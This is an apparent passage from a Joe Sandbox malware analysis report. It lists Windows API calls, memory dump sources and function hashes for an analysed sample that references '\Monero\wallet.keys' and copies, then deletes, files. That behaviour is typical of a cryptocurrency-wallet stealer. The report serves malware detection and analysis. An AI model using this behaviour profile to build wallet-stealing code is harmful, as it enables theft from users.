                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Time$System$File$ExitProcesssscanf
                                        • String ID:
                                        • API String ID: 2533653975-0
                                        • Opcode ID: 9b881d7ec65a488ed70a93fbb00b8d0f78f599a16903f4c3d00c33a695415d91
                                        • Instruction ID: 9c3c83a13e2217fea8c80618d08fd5d43a73500f641831c71001a681361131ee
                                        • Opcode Fuzzy Hash: 9b881d7ec65a488ed70a93fbb00b8d0f78f599a16903f4c3d00c33a695415d91
                                        • Instruction Fuzzy Hash: C321ECB5D14208ABDF04EFE4D945AEEB7B9FF48301F04852EE506E3250EB345609CBA9
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A57E37
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A57E3E
                                        • RegOpenKeyExA.ADVAPI32(80000002,015FBF40,00000000,00020119,?), ref: 00A57E5E
                                        • RegQueryValueExA.ADVAPI32(?,0160DD60,00000000,00000000,000000FF,000000FF), ref: 00A57E7F
                                        • RegCloseKey.ADVAPI32(?), ref: 00A57E92
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 6c6f71576b6c1b72513897e12b0840eedab641959b2e9d27a7cd33b4244e3c90
                                        • Instruction ID: c2966c6470710998612580c7e9514f3f1706072fb0c3c1fd955c6d0b2070caac
                                        • Opcode Fuzzy Hash: 6c6f71576b6c1b72513897e12b0840eedab641959b2e9d27a7cd33b4244e3c90
                                        • Instruction Fuzzy Hash: 19115EB1A44205FBEB10CF94ED4AFBFBBB8FB44B11F10415AFA05A7280D77458048BA5
                                        APIs
                                        • StrStrA.SHLWAPI(0160E068,?,?,?,00A5140C,?,0160E068,00000000), ref: 00A5926C
                                        • lstrcpyn.KERNEL32(00C8AB88,0160E068,0160E068,?,00A5140C,?,0160E068), ref: 00A59290
                                        • lstrlen.KERNEL32(?,?,00A5140C,?,0160E068), ref: 00A592A7
                                        • wsprintfA.USER32 ref: 00A592C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpynlstrlenwsprintf
                                        • String ID: %s%s
                                        • API String ID: 1206339513-3252725368
                                        • Opcode ID: d63ea1a98d951cfe9b70937f98db1658d483a828838750b490f79750ce2d187d
                                        • Instruction ID: 43f2048f34d8dc55f592cc30da63cbdf9fd528fcf1c1cc027cc4dfd2b161085b
                                        • Opcode Fuzzy Hash: d63ea1a98d951cfe9b70937f98db1658d483a828838750b490f79750ce2d187d
                                        • Instruction Fuzzy Hash: DA01DE75500208FFDB04DFECC984EAE7BB9FB48355F108549F9099B245C635EA40DB95
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A412B4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A412BB
                                        • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A412D7
                                        • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A412F5
                                        • RegCloseKey.ADVAPI32(?), ref: 00A412FF
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID:
                                        • API String ID: 3225020163-0
                                        • Opcode ID: 6bdecf6adc04e8f76802fac5956d7545bdb7539560695fa4864ba7347bafcc6c
                                        • Instruction ID: 2f65f982d706bf6ed79863e364944e398b52383b442f8062c3093c6fe476f79f
                                        • Opcode Fuzzy Hash: 6bdecf6adc04e8f76802fac5956d7545bdb7539560695fa4864ba7347bafcc6c
                                        • Instruction Fuzzy Hash: 9E0136B9A40208BBEB00DFD0DC49FAEB7B8EB48701F008159FA05D72C0D6749A019F55
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: String___crt$Type
                                        • String ID:
                                        • API String ID: 2109742289-3916222277
                                        • Opcode ID: 853d46ff129cd9bd39e2d519ac8ece3d383d6e1f1d7b72dc886cb5f6d09dc218
                                        • Instruction ID: bc86f3a6334949a6021b638980b05e1d2b0e569b585534eb99ba7842e024b4ed
                                        • Opcode Fuzzy Hash: 853d46ff129cd9bd39e2d519ac8ece3d383d6e1f1d7b72dc886cb5f6d09dc218
                                        • Instruction Fuzzy Hash: 5F41D4B150079C9EDB218B248D84BFBBBF8BB45715F1444A8ED8A86186D2719A49CF60
                                        APIs
                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00A56663
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                        • ShellExecuteEx.SHELL32(0000003C), ref: 00A56726
                                        • ExitProcess.KERNEL32 ref: 00A56755
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                        • String ID: <
                                        • API String ID: 1148417306-4251816714
                                        • Opcode ID: 5a15be8a490a2397eca2187096fb37ceb483a997dd0a910824030441dfc3b7d5
                                        • Instruction ID: 54017a9601416e3f119df8661e3935a344eca7bae3148246055f97e8cfd1b9a4
                                        • Opcode Fuzzy Hash: 5a15be8a490a2397eca2187096fb37ceb483a997dd0a910824030441dfc3b7d5
                                        • Instruction Fuzzy Hash: 333149B1901218AADB14EB90DD82BDEB778BF14301F404299F70966191DF746B48CF6A
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00A60E28,00000000,?), ref: 00A5882F
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A58836
                                        • wsprintfA.USER32 ref: 00A58850
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesslstrcpywsprintf
                                        • String ID: %dx%d
                                        • API String ID: 1695172769-2206825331
                                        • Opcode ID: d0a065f766faf8da72814911dde543cd0bd5bd578a16397e384482237f790708
                                        • Instruction ID: 2f0dbfe5f5913254e272aa5ad44b25f7a5c9200d9e1ac2c3389460de13d67d27
                                        • Opcode Fuzzy Hash: d0a065f766faf8da72814911dde543cd0bd5bd578a16397e384482237f790708
                                        • Instruction Fuzzy Hash: 8E2100B1A40204BFEB04DFD4DD45FAEBBB8FB48711F104519FA05A72C0C77999018BA5
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00A5951E,00000000), ref: 00A58D5B
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00A58D62
                                        • wsprintfW.USER32 ref: 00A58D78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateProcesswsprintf
                                        • String ID: %hs
                                        • API String ID: 769748085-2783943728
                                        • Opcode ID: 8ab8ef96c2d705768631713ee7f55419d8b0c07fcc1cbdd6aaf23c12e1c5ab7a
                                        • Instruction ID: 6e1d0db612b6c73483daa20f53e67f9c7ccf5494abf670e9f8e2d11a0b4a96d4
                                        • Opcode Fuzzy Hash: 8ab8ef96c2d705768631713ee7f55419d8b0c07fcc1cbdd6aaf23c12e1c5ab7a
                                        • Instruction Fuzzy Hash: AAE0ECB5A40208BBE710DB94DD0AF6D77B8EB44702F004595FE0997280DA719E109BAA
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A4A2E1
                                        • lstrlen.KERNEL32(00000000,00000000), ref: 00A4A3FF
                                        • lstrlen.KERNEL32(00000000), ref: 00A4A6BC
                                          • Part of subcall function 00A5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A5A7E6
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A4A743
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                        • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 54fc089d7e968ffe62da8bdcb9235501fb0a53bda0fafe5255dbbc9d40215be7
                                        • Instruction ID: 12ffd4d0e084c469a153febb6bd5a292b61dd5f7aeb101fe6612072527f38002
                                        • Opcode Fuzzy Hash: 54fc089d7e968ffe62da8bdcb9235501fb0a53bda0fafe5255dbbc9d40215be7
                                        • Instruction Fuzzy Hash: F8E10272A101189ADB04FBA4DE92EEE733CBF64301F508659F91772091EF346A4DCB66
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A4D481
                                        • lstrlen.KERNEL32(00000000), ref: 00A4D698
                                        • lstrlen.KERNEL32(00000000), ref: 00A4D6AC
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A4D72B
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AF1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000AFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000B22000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137026012.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000C9E000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F21000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F29000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137176697.0000000000F37000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137443072.0000000000F38000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137642310.00000000010D1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2137654171.00000000010D2000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_a40000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                        • String ID:
                                        • API String ID: 211194620-0
                                        • Opcode ID: 77365c2c1f6a93be811f7647403b60b7887335bee5d3bd46ac259149a19e9a65
                                        • Instruction ID: f089b61d726a62104386f8be4a9dacf9184718e8af9b82d5af1eec672cda93c6
                                        • Opcode Fuzzy Hash: 77365c2c1f6a93be811f7647403b60b7887335bee5d3bd46ac259149a19e9a65
                                        • Instruction Fuzzy Hash: DC911472A101189BDB04FBA0DE56EEE7338BF64301F504669F907B6091EF346A4DCB66
                                        APIs
                                          • Part of subcall function 00A5A740: lstrcpy.KERNEL32(00A60E17,00000000), ref: 00A5A788
                                          • Part of subcall function 00A5A9B0: lstrlen.KERNEL32(?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A5A9C5
                                          • Part of subcall function 00A5A9B0: lstrcpy.KERNEL32(00000000), ref: 00A5AA04
                                          • Part of subcall function 00A5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A5AA12
                                          • Part of subcall function 00A5A8A0: lstrcpy.KERNEL32(?,00A60E17), ref: 00A5A905
                                          • Part of subcall function 00A58B60: GetSystemTime.KERNEL32(00A60E1A,0160A9C8,00A605AE,?,?,00A413F9,?,0000001A,00A60E1A,00000000,?,016091B8,?,\Monero\wallet.keys,00A60E17), ref: 00A58B86
                                          • Part of subcall function 00A5A920: lstrcpy.KERNEL32(00000000,?), ref: 00A5A972
                                          • Part of subcall function 00A5A920: lstrcat.KERNEL32(00000000), ref: 00A5A982
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00A4D801
                                        • lstrlen.KERNEL32(00000000), ref: 00A4D99F
                                        • lstrlen.KERNEL32(00000000), ref: 00A4D9B3
                                        • DeleteFileA.KERNEL32(00000000), ref: 00A4DA32
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2137026012.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                         • Associated: 00000000.00000002.2136987282.0000000000A40000.00000004.00000001.01000000.00000003.sdmp
